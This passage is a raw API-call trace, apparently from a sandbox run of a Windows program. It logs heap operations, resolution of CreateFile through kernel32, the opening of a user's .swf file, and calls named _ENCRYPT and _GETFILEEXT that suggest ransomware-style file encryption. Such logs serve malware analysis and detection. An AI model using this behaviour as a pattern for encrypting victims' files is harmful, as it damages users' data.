Size=0x10) returned 0x9ba000 [0198.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0198.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0198.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0198.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0198.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0198.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0198.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0198.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0198.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0198.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0198.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0198.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0198.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0198.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0198.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0198.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0198.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0198.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0198.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0198.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0198.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0198.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0198.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0198.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0198.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0198.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0198.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0198.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0198.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0198.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0198.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0198.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0198.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0198.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0198.280] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0198.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0198.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0198.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0198.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0198.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0198.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0198.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0198.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0198.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0198.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0198.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0198.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0198.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0198.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0198.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0198.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0198.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0198.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0198.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0198.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0198.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0198.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0198.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0198.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0198.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0198.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0198.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0198.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0198.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0198.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0198.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0198.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0198.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0198.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0198.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0198.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0198.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0198.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0198.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0198.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0198.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0198.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0198.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0198.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0198.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0198.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0198.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0198.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0198.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0198.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0198.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0198.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0198.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0198.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0198.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0198.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0198.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0198.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0198.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0198.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0198.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0198.282] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0198.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0198.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0198.282] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0198.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd990 [0198.282] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd990, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0198.282] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\Mmrkxsc9iiZ.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ghioo2t\\mmrkxsc9iiz.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0198.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0198.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0198.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0198.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0198.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0198.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0198.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0198.283] FreeLibrary (hLibModule=0x75990000) returned 1 [0198.283] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0198.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0198.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0198.283] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0198.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0198.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0198.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0198.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0198.283] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0198.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0198.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0198.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0198.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0198.284] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0198.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0198.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0198.284] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0198.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba540 [0198.284] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9ba540, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0198.284] FreeLibrary (hLibModule=0x75990000) returned 1 [0198.284] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0198.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0198.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0198.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0198.284] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0198.285] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0198.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0198.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0198.285] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0198.285] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0198.285] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0198.285] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0198.285] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0198.285] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.285] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.285] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="swf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.285] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".swf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0198.285] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.285] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.285] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.285] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\Mmrkxsc9iiZ.swf", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x210cc660, ftCreationTime.dwHighDateTime=0x1d5d964, ftLastAccessTime.dwLowDateTime=0x7df0cc0, ftLastAccessTime.dwHighDateTime=0x1d5de3c, ftLastWriteTime.dwLowDateTime=0x7df0cc0, ftLastWriteTime.dwHighDateTime=0x1d5de3c, nFileSizeHigh=0x0, nFileSizeLow=0x8c35, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Mmrkxsc9iiZ.swf", cAlternateFileName="MMRKXS~1.SWF")) returned 0x90add8 [0198.285] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0198.286] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.286] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\Mmrkxsc9iiZ.swf", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x210cc660, ftCreationTime.dwHighDateTime=0x1d5d964, ftLastAccessTime.dwLowDateTime=0x7df0cc0, ftLastAccessTime.dwHighDateTime=0x1d5de3c, ftLastWriteTime.dwLowDateTime=0x7df0cc0, ftLastWriteTime.dwHighDateTime=0x1d5de3c, nFileSizeHigh=0x0, nFileSizeLow=0x8c35, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Mmrkxsc9iiZ.swf", cAlternateFileName="MMRKXS~1.SWF")) returned 0x90add8 [0198.286] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0198.286] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.286] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\Mmrkxsc9iiZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.286] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\Mmrkxsc9iiZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.286] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\Mmrkxsc9iiZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.286] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\Mmrkxsc9iiZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.286] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\Mmrkxsc9iiZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.286] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\Mmrkxsc9iiZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.286] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\Mmrkxsc9iiZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.286] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\Mmrkxsc9iiZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.286] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\Mmrkxsc9iiZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.286] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\Mmrkxsc9iiZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.286] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\Mmrkxsc9iiZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.286] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\Mmrkxsc9iiZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.286] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\Mmrkxsc9iiZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.286] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\Mmrkxsc9iiZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.286] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Videos\\GHIoo2t\\Mmrkxsc9iiZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.286] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Videos\\GHIoo2t\\Mmrkxsc9iiZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Videos\\GHIoo2t\\Mmrkxsc9iiZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Videos\\GHIoo2t\\Mmrkxsc9iiZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Videos\\GHIoo2t\\Mmrkxsc9iiZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Videos\\GHIoo2t\\Mmrkxsc9iiZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Videos\\GHIoo2t\\Mmrkxsc9iiZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Videos\\GHIoo2t\\Mmrkxsc9iiZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Videos\\GHIoo2t\\Mmrkxsc9iiZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Videos\\GHIoo2t\\Mmrkxsc9iiZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Videos\\GHIoo2t\\Mmrkxsc9iiZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Videos\\GHIoo2t\\Mmrkxsc9iiZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Videos\\GHIoo2t\\Mmrkxsc9iiZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Videos\\GHIoo2t\\Mmrkxsc9iiZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Videos\\GHIoo2t\\Mmrkxsc9iiZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Videos\\GHIoo2t\\Mmrkxsc9iiZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Videos\\GHIoo2t\\Mmrkxsc9iiZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos\\GHIoo2t\\Mmrkxsc9iiZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.287] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos\\GHIoo2t\\Mmrkxsc9iiZ.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.287] CompareStringW (Locale=0x400, 